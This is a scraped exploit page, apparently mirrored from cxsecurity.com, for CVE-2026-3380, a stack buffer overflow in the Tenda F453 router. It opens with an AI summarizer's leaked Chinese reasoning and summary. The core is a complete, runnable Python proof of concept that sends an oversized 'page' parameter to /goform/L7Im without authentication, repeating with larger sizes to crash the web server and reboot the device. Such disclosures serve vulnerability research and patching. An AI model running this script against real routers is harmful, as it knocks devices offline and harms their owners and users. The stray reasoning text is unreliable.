Tenda F453 v1.0.0.3 frmL7ImForm Buffer Overflow
好的,我现在需要帮用户总结一篇关于Tenda F453路由器漏洞的文章,控制在100字以内。首先,我得仔细阅读用户提供的内容,了解文章的主要信息。 文章标题是“Tenda F453 v1.0.0.3 frmL7ImForm Buffer Overflow”,看起来这是一个缓冲区溢出漏洞。接着,文章提到了CVE编号是CVE-2026-3380,日期是2026年3月1日。作者是Mohammed Idrees Banyamer,来自约旦。漏洞影响的是Tenda F453 v1.0.0.3版本的路由器。 描述部分提到,这个漏洞是由于frmL7ImForm函数中使用了不安全的sprintf和strcpy函数导致的堆栈溢出。攻击者可以通过发送包含超长'page'参数的请求到/goform/L7Im路径来触发漏洞。这会导致httpd服务崩溃,进而使设备重启,造成拒绝服务(DoS)。 此外,文章还提供了一个Python脚本作为概念验证(PoC),用户可以通过运行该脚本并指定目标IP地址和payload大小来测试漏洞。需要注意的是,这个漏洞不需要认证即可利用。 现在,我需要将这些关键信息浓缩到100字以内。首先确定主要点:漏洞名称、影响设备、漏洞原因、攻击方式、后果以及PoC的存在。 然后组织语言,确保简洁明了。例如: “Tenda F453路由器v1.0.0.3版本中存在堆栈溢出漏洞(CVE-2026-3380),源于frmL7ImForm函数中不安全的字符串处理。攻击者通过构造超长'page'参数请求/goform/L7Im路径可触发缓冲区溢出,导致httpd服务崩溃和设备重启(DoS)。该漏洞无需认证即可利用。” 检查字数是否在限制内,并确保所有关键点都被涵盖。 </think> Tenda F453路由器v1.0.0.3版本中存在堆栈溢出漏洞(CVE-2026-3380),源于frmL7ImForm函数中不安全的字符串处理。攻击者通过构造超长'page'参数请求/goform/L7Im路径可触发缓冲区溢出,导致httpd服务崩溃和设备重启(DoS)。该漏洞无需认证即可利用。 2026-3-2 21:11:15 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

Tenda F453 v1.0.0.3 frmL7ImForm Buffer Overflow

#!/usr/bin/env python3 # Exploit Title: Tenda F453 frmL7ImForm Buffer Overflow # CVE: CVE-2026-3380 # Date: 2026-03-01 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://www.tenda.com.cn/ # Software Link: # Affected: Tenda F453 v1.0.0.3 # Tested on: Tenda F453 v1.0.0.3 # Category: Remote # Platform: Embedded (Linux-based router) # Exploit Type: Denial of Service / Buffer Overflow # CVSS: 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Description: Stack-based buffer overflow in /goform/L7Im via the 'page' parameter # due to unsafe use of sprintf/strcpy in frmL7ImForm function. # Fixed in: # Usage: # python3 exploit.py <target_ip> [size] # # Examples: # python3 exploit.py 192.168.0.1 # python3 exploit.py 192.168.1.1 2300 # # Options: # -- (no additional options implemented) # # Notes: # • For authorized testing / research purposes only # • Most likely causes httpd crash → device reboot (DoS) # • Unauthenticated in affected firmware version # # How to Use # # Step 1: # Connect to the same network as the target router # # Step 2: # Run the script with the router's LAN IP address # # ──────────────────────────────────────────────── import sys import requests import urllib.parse import time def trigger_overflow(target, size=2048): url = f"http://{target}/goform/L7Im" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Referer": f"http://{target}/", "Connection": "close", } overflow = "A" * size data = { "page": overflow, "module": "L7Im", "action": "apply", } body = urllib.parse.urlencode(data) print(f"[*] Sending to {url}") print(f" Payload length : {len(overflow)} bytes") try: r = requests.post( url, data=body, headers=headers, timeout=6, allow_redirects=False, verify=False ) print(f"[+] Got response → HTTP {r.status_code}") print(f" Content-Length: {len(r.content)} bytes") except requests.exceptions.Timeout: print("[!] TIMEOUT → very likely crashed / httpd died") except requests.exceptions.ConnectionError as e: print(f"[!] ConnectionError: {e} → device probably rebooted") except Exception as e: print(f"[!] Unexpected error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 exploit.py <target_ip> [size]") print("Example: python3 exploit.py 192.168.0.1 2300") sys.exit(1) target_ip = sys.argv[1].strip() payload_size = int(sys.argv[2]) if len(sys.argv) > 2 else 2048 print(f"[+] CVE-2026-3380 Exploit - Tenda F453 /goform/L7Im") print(f" Target: {target_ip}") print(f" Size : {payload_size} bytes\n") for sz in [payload_size, payload_size + 512, payload_size + 1024]: print(f"\n─── Trying size = {sz} ───") trigger_overflow(target_ip, sz) time.sleep(2)

References:

https://nvd.nist.gov/vuln/detail/CVE-2026-3380

https://vuldb.com/?id.348265

https://github.com/Litengzheng/vul_db/blob/main/F453/vul_81/README.md

https://www.tenda.com.cn/

(vendor site) Exploit PoC script (attached or linked in your submission): Python code sending oversized 'page' to /goform/L7Im




 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Copyright 2026, cxsecurity.com

Back to Top


文章来源: https://cxsecurity.com/issue/WLB-2026030001
如有侵权请联系:admin#unsafe.sh